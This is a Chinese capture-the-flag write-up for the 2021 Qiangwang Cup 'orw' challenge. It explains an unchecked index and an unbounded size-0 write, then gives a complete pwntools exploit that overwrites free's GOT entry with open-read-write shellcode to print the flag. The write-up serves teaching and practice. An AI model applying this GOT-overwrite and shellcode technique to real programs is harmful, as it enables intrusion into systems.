2021 强网杯 [强网先锋]orw
开了沙盒,利用orw来读flag
没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出
往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。
发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。
(0x2020E0 - 0x202018) / 8 = 25
exp如下
from pwn import *
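context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'


def li(x):
    """Print *x* highlighted in orange (ad-hoc progress logging)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print *x* highlighted in red (ad-hoc progress logging)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


context.terminal = ['tmux', 'splitw', '-h']

# The writeup does not give the service address; these are placeholders that
# must be filled in before switching `debug` to a non-zero value.
REMOTE_HOST = 'CHANGE_ME_HOST'  # placeholder, not from the writeup
REMOTE_PORT = 0                 # placeholder, not from the writeup

# Non-zero selects the remote service, 0 runs the local binary.
debug = 0
if debug:
    # The original script called remote() with no arguments, which raises
    # TypeError before anything is sent; host and port are required.
    r = remote(REMOTE_HOST, REMOTE_PORT)
else:
    r = process(file_name)
elf = ELF(file_name)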
def dbg():
    """Attach gdb to the running target `r` in the terminal configured on `context.terminal`."""
    gdb.attach(r)
# The "orw" payload the writeup refers to: open("flag"), read it onto the stack,
# write it to stdout, then exit. It is used instead of a shell because the
# challenge runs under a sandbox (see the note at the top of the page).
# 0x67616c66 is "flag" in little-endian order; `push rax` leaves it on the
# stack followed by zero bytes, so rsp points at a NUL-terminated path.
shellcode = asm('''
mov rax,0x67616c66
push rax
mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall
mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall
mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall
mov rdi,0
mov rax,60
syscall
''')
# Menu option 1 (presumably the add/write operation): index -25 is the
# offset computed above that lands on free's GOT slot, size 0 is the case the
# writeup identifies as an unbounded write, and the content is the payload.
r.sendlineafter('choice >>', str(1))
r.sendlineafter('index:', str(-25))
r.sendlineafter('size:', str(0))
r.sendlineafter('content:', shellcode)
# Menu option 4 is the free operation the writeup mentions; freeing slot 0
# goes through the overwritten GOT entry.
r.sendlineafter('choice >>', str(4))
r.sendlineafter('index:', str(0))
r.interactive()